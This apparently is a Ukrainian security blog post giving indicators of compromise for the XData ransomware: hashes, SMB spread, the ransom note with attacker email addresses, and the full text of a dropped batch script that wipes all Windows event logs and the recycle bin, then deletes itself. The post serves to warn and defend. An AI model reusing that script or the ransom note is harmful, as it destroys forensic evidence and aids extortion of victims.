IOC_xdata_190517

Увага! Нова хвиля ransomware .~xdata~

Пост буду оновлювати по ходу аналізу.

update 22/05/17 17:40

Підтверджена причетність другого зразка. Доданий його аналіз.

Вдалося встановити взаємозв’язок зразків:

BDD2ECF290406B8A09EB01016C7658A283C407C3 використовується для активації та розповсюдження по мережі

9C694094BCBEB6E87CD8DD03B80B48AC1041ADC9 безпосередньо шифрує

Замовники, котрі використовують актуальні DAT файли захищені:

Демонстрація роботи xdata

Увага!

Станом на 22/05 люди які використовують ці АВ перебувають у групі ризику:

File Name xdata2.exe
MD5 Hash Identifier C6A2FB56239614924E2AB3341B1FBBA5
SHA-1 Hash Identifier BDD2ECF290406B8A09EB01016C7658A283C407C3
SHA-256 Hash Identifier 92AD1B7965D65BFEF751CF6E4E8AD4837699165626E25131409D4134F031A497
File Size 944128 bytes

File Name msaddc.exe
MD5 Hash Identifier A0A7022CAA8BD8761D6722FE3172C0AF
SHA-1 Hash Identifier 9C694094BCBEB6E87CD8DD03B80B48AC1041ADC9
SHA-256 Hash Identifier D174F0C6DED55EB315320750AAA3152FC241ACBFAEF662BF691FFD0080327AB9
File Size 68608 bytes

update 19/05/17 18:00

як і WannaCry для розповсюдження використовує вразливість SMB
після локального шифрування здійснює спроби конектитись на 139 ТСР підмережі

З учорашнього дня зросла активність ransomware.
За даними @malwrhunterteam кількість запитів по цьому зразку перевищила wannacry
Статистика по одному із семплів – 22 аплоади, 16 унікальних

Попередньо – точка входу фішинг. Приєднання або лінк.

IOC відомі на 22/05/17 :
– – – – – – – – – – – – – – – – – – – – –

PAYLOAD _ частина яка безпосередньо виконує шифрування

File Name 2.exe
MD5 Hash Identifier c6a2fb56239614924e2ab3341b1fbba5
SHA-1 Hash Identifier bdd2ecf290406b8a09eb01016c7658a283c407c3
SHA-256 Hash Identifier 92ad1b7965d65bfef751cf6e4e8ad4837699165626e25131409d4134f031a497
File Size 944128 bytes

File Name msdcom.exe
MD5 Hash Identifier A0A7022CAA8BD8761D6722FE3172C0AF
SHA-1 Hash Identifier 9C694094BCBEB6E87CD8DD03B80B48AC1041ADC9
SHA-256 Hash Identifier D174F0C6DED55EB315320750AAA3152FC241ACBFAEF662BF691FFD0080327AB9
File Size 68608 bytes

“c:\users\admini~1\appdata\local\temp\d78.tmp.bat”

Зміст файлу D78.tmp.bat

@echo off
timeout /T 10
FOR /F “tokens=1,2*” %%V IN (‘bcdedit’) DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F “tokens=*” %%G in (‘wevtutil.exe el’) DO (call :do_clear “%%G”)
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1

goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo.
:theEnd
rd /s /q %systemdrive%\$RECYCLE.BIN
del %0

Після шифрування семпл залишає такий запис:

Your IMPORTANT FILES WERE ENCRYPTED on this computer: documents, databases, photos, videos, etc.

Encryption was prodused using unique public key for this computer.
To decrypt files, you need to obtain private key and special tool.

To retrieve the private key and tool find your pc key file with ‘.key.~xdata~’ extension.
Depending on your operation system version and personal settings, you can find it in:
‘C:/’,
‘C:/ProgramData’,
‘C:/Documents and Settings/All Users/Application Data’,
‘Your Desktop’
folders (eg. ‘C:/PC-TTT54M#45CD.key.~xdata~’).

Then send it to one of following email addresses:

begins@colocasia.org
bilbo@colocasia.org
frodo@colocasia.org
trevor@thwonderfulday.com
bob@thwonderfulday.com
bil@thwonderfulday.com

Your ID: xxxx-PC#xxxxxx967E0B769FFAB70F843Axxxxxx

Do not worry if you did not find key file, anyway contact for support.

PS

додаткова інформація з інших джерел

https://www.bleepingcomputer.com/news/security/xdata-ransomware-on-a-rampage-in-ukraine/

Будьте уважні та обережні

VR

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: